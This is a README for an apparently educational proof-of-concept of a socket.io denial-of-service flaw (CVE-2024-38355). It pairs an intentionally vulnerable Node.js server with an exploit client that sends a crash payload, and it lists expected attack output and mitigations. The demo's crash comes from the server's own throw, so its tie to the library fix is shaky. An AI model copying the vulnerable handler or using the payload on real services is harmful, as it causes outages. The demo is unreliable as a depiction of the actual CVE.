# CVE-2024-38355 Demo (Socket.IO Crash)

This project is a Proof of Concept demonstrating **CVE-2024-38355**, a denial-of-service vulnerability in `socket.io`. The project was created for educational purposes to show the attack mechanism and how to protect applications.

## About the Vulnerability (CVE-2024-38355)

This vulnerability affects `socket.io` versions:
- **< 2.5.1**
- **>= 3.0.0, < 4.6.2**

A specially crafted Socket.IO packet can trigger an uncaught exception on the server, causing the Node.js process to crash. This results in a **Denial of Service (DoS)** attack.

**How it works:**
1. The client connects normally to the Socket.IO server.
2. The client sends a malicious event/packet that triggers an error on the server.
3. If the server code throws an exception (e.g., from processing untrusted input) and there's no error handler on the socket, the uncaught exception crashes the entire Node.js process.
4. The server becomes unavailable to all users.

**Key factors:**
- The absence of an `error` event listener on the socket
- Server-side code that can throw exceptions when processing client data
- No global uncaught exception handler

## Project Structure

The project consists of two Docker containers:

1. **vulnerable-server**: A Node.js server using vulnerable `socket.io@4.6.1`. It has an event handler that can throw an uncaught exception when receiving malicious data.
2. **exploit-client**: A Node.js script that connects to the server, first tests normal operation, then sends a payload that crashes the server.

## Requirements

* Docker
* Docker Compose

Or alternatively:
* Node.js 18+
* npm

## How to Run

### Option 1: Using Docker Compose (Recommended)

Open a terminal in the project root directory and run:

```bash
docker-compose down
docker-compose build --no-cache
docker-compose up
```

This will:
1. Build images for the server and client.
2. Start the server on port 3000.
3. Start the exploit client which will automatically attack and crash the server.

### Option 2: Running Locally (Without Docker)

**Terminal 1 - Start the server:**
```bash
cd server
npm install
npm start
```

**Terminal 2 - Run the exploit:**
```bash
cd exploit
npm install
npm start
```

## Expected Output

**Server logs:**
```
[SERVER] Running on port 3000. Waiting for connections...
[SERVER] Client connected: <socket-id>
[SERVER] Processing data: {"message":"Hello, normal request"}
[SERVER] Client disconnected: <socket-id>
[SERVER] Client connected: <socket-id>
[SERVER] Processing data: {"trigger":"crash"}
/app/index.js:24
            throw new Error('Uncaught exception triggered by malicious packet');
```

**Exploit logs:**
```
[EXPLOIT] CVE-2024-38355 Proof of Concept
[EXPLOIT] Targeting http://vulnerable-server:3000...

[STEP 1] Testing normal connection...
[STEP 1] Connected successfully.
[STEP 1] Received response: {"status":"processed","data":{"message":"Hello, normal request"}}

[STEP 2] Sending malicious payload to trigger CVE-2024-38355...
[STEP 2] Connected. Sending crash trigger...
[STEP 2] Payload sent! Waiting for server to crash...
[STEP 2] Disconnected (server may have crashed).

[STEP 3] Checking if server is still alive...
[RESULT] SUCCESS! Server is unreachable: xhr poll error
```

## Stopping

Press `Ctrl+C` or run:
```bash
docker-compose down
```

## Code Analysis

### Vulnerable Server (`server/index.js`)
```javascript
socket.on('process_data', (data) => {
    // VULNERABLE: No try-catch, no error handler on socket
    if (data && data.trigger === 'crash') {
        throw new Error('Uncaught exception');  // Crashes the process!
    }
});
```

### Exploit (`exploit/exploit.js`)
```javascript
// Send malicious payload that triggers the crash
socket.emit('process_data', { trigger: 'crash' });
```

## How to Fix?

To protect your application from this vulnerability:

1. **Update `socket.io`** to version **4.6.2** or newer (the fix adds a default noop error handler).

2. **Always attach error handlers** to sockets:
   ```javascript
   socket.on('error', (err) => {
       console.error('Socket error:', err);
       // Handle gracefully, don't let it crash the server
   });
   ```

3. **Wrap event handlers in try-catch:**
   ```javascript
   socket.on('process_data', (data) => {
       try {
           // Process data safely
       } catch (err) {
           console.error('Error processing data:', err);
           socket.emit('error_response', { message: 'Invalid data' });
       }
   });
   ```

4. **Add a global uncaught exception handler** (as a last resort):
   ```javascript
   process.on('uncaughtException', (err) => {
       console.error('Uncaught Exception:', err);
       // Log and gracefully shutdown
   });
   ```

## References

- [CVE-2024-38355 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-38355)
- [GitHub Security Advisory GHSA-25hc-qcg6-38wj](https://github.com/socketio/socket.io/security/advisories/GHSA-25hc-qcg6-38wj)
- [Fix Commit](https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115)

---
*Project created for educational purposes.*
